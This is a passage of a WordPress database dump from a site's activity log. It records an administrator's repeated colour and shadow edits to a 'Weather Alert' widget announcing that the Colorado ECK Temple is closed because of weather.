conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238245,40499,'_message_key','widget_edited'),(238246,40499,'_user_id','2'),(238247,40499,'_user_login','S8zhaBda'),(238248,40499,'_user_email','nada@zipnadanot.org'),(238249,40499,'_server_remote_addr','76.130.120.x'),(238250,40499,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238251,40500,'widget_id_base','custom_html'),(238252,40500,'widget_name_translated','Custom HTML'),(238253,40500,'sidebar_id','null'),(238254,40500,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 2, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238255,40500,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 25, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238256,40500,'_message_key','widget_edited'),(238257,40500,'_user_id','2'),(238258,40500,'_user_login','S8zhaBda'),(238259,40500,'_user_email','nada@zipnadanot.org'),(238260,40500,'_server_remote_addr','76.130.120.x'),(238261,40500,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238262,40501,'widget_id_base','custom_html'),(238263,40501,'widget_name_translated','Custom HTML'),(238264,40501,'sidebar_id','null'),(238265,40501,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 2, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238266,40501,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 256, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}');
INSERT INTO `wpcl_simple_history_contexts` VALUES (238267,40501,'_message_key','widget_edited'),(238268,40501,'_user_id','2'),(238269,40501,'_user_login','S8zhaBda'),(238270,40501,'_user_email','nada@zipnadanot.org'),(238271,40501,'_server_remote_addr','76.130.120.x'),(238272,40501,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238273,40502,'widget_id_base','custom_html'),(238274,40502,'widget_name_translated','Custom HTML'),(238275,40502,'sidebar_id','null'),(238276,40502,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 256, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238277,40502,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 256, 2, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238168,40492,'_message_key','widget_edited'),(238169,40492,'_user_id','2'),(238170,40492,'_user_login','S8zhaBda'),(238171,40492,'_user_email','nada@zipnadanot.org'),(238172,40492,'_server_remote_addr','76.130.120.x'),(238173,40492,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238174,40493,'widget_id_base','custom_html'),(238175,40493,'widget_name_translated','Custom HTML'),(238176,40493,'sidebar_id','null'),(238177,40493,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #ff; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238178,40493,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #fffff; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238179,40493,'_message_key','widget_edited'),(238180,40493,'_user_id','2'),(238181,40493,'_user_login','S8zhaBda'),(238182,40493,'_user_email','nada@zipnadanot.org'),(238183,40493,'_server_remote_addr','76.130.120.x'),(238184,40493,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238185,40494,'widget_id_base','custom_html'),(238186,40494,'widget_name_translated','Custom HTML'),(238187,40494,'sidebar_id','null'),(238188,40494,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #ff; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238189,40494,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #ffffff; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238190,40494,'_message_key','widget_edited'),(238191,40494,'_user_id','2'),(238192,40494,'_user_login','S8zhaBda'),(238193,40494,'_user_email','nada@zipnadanot.org'),(238194,40494,'_server_remote_addr','76.130.120.x'),(238195,40494,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238196,40495,'widget_id_base','custom_html'),(238197,40495,'widget_name_translated','Custom HTML'),(238198,40495,'sidebar_id','null'),(238199,40495,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #ffffff; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238200,40495,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238201,40495,'_message_key','widget_edited'),(238202,40495,'_user_id','2'),(238203,40495,'_user_login','S8zhaBda'),(238204,40495,'_user_email','nada@zipnadanot.org'),(238205,40495,'_server_remote_addr','76.130.120.x'),(238206,40495,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238207,40496,'widget_id_base','custom_html'),(238208,40496,'widget_name_translated','Custom HTML'),(238209,40496,'sidebar_id','null'),(238210,40496,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238211,40496,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(2, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238212,40496,'_message_key','widget_edited'),(238213,40496,'_user_id','2'),(238214,40496,'_user_login','S8zhaBda'),(238215,40496,'_user_email','nada@zipnadanot.org'),(238216,40496,'_server_remote_addr','76.130.120.x'),(238217,40496,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238218,40497,'widget_id_base','custom_html'),(238219,40497,'widget_name_translated','Custom HTML'),(238220,40497,'sidebar_id','null'),(238221,40497,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(2, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238222,40497,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(25, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238113,40487,'_message_key','post_updated'),(238114,40487,'_user_id','2'),(238115,40487,'_user_login','S8zhaBda'),(238116,40487,'_user_email','nada@zipnadanot.org'),(238117,40487,'_server_remote_addr','76.130.120.x'),(238118,40487,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(238119,40488,'widget_id_base','custom_html'),(238120,40488,'widget_name_translated','Custom HTML'),(238121,40488,'sidebar_id','null'),(238122,40488,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238123,40488,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; \\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238124,40488,'_message_key','widget_edited'),(238125,40488,'_user_id','2'),(238126,40488,'_user_login','S8zhaBda'),(238127,40488,'_user_email','nada@zipnadanot.org'),(238128,40488,'_server_remote_addr','76.130.120.x'),(238129,40488,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238130,40489,'widget_id_base','custom_html'),(238131,40489,'widget_name_translated','Custom HTML'),(238132,40489,'sidebar_id','null'),(238133,40489,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; \\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238134,40489,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238135,40489,'_message_key','widget_edited'),(238136,40489,'_user_id','2'),(238137,40489,'_user_login','S8zhaBda'),(238138,40489,'_user_email','nada@zipnadanot.org'),(238139,40489,'_server_remote_addr','76.130.120.x'),(238140,40489,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238141,40490,'widget_id_base','custom_html'),(238142,40490,'widget_name_translated','Custom HTML'),(238143,40490,'sidebar_id','null'),(238144,40490,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238145,40490,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #ff; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238146,40490,'_message_key','widget_edited'),(238147,40490,'_user_id','2'),(238148,40490,'_user_login','S8zhaBda'),(238149,40490,'_user_email','nada@zipnadanot.org'),(238150,40490,'_server_remote_addr','76.130.120.x'),(238151,40490,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238152,40491,'widget_id_base','custom_html'),(238153,40491,'widget_name_translated','Custom HTML'),(238154,40491,'sidebar_id','null'),(238155,40491,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #ff; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238156,40491,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #fff; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238157,40491,'_message_key','widget_edited'),(238158,40491,'_user_id','2'),(238159,40491,'_user_login','S8zhaBda'),(238160,40491,'_user_email','nada@zipnadanot.org'),(238161,40491,'_server_remote_addr','76.130.120.x'),(238162,40491,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238163,40492,'widget_id_base','custom_html'),(238164,40492,'widget_name_translated','Custom HTML'),(238165,40492,'sidebar_id','null'),(238166,40492,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #ff; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238167,40492,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #ffff; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238112,40487,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 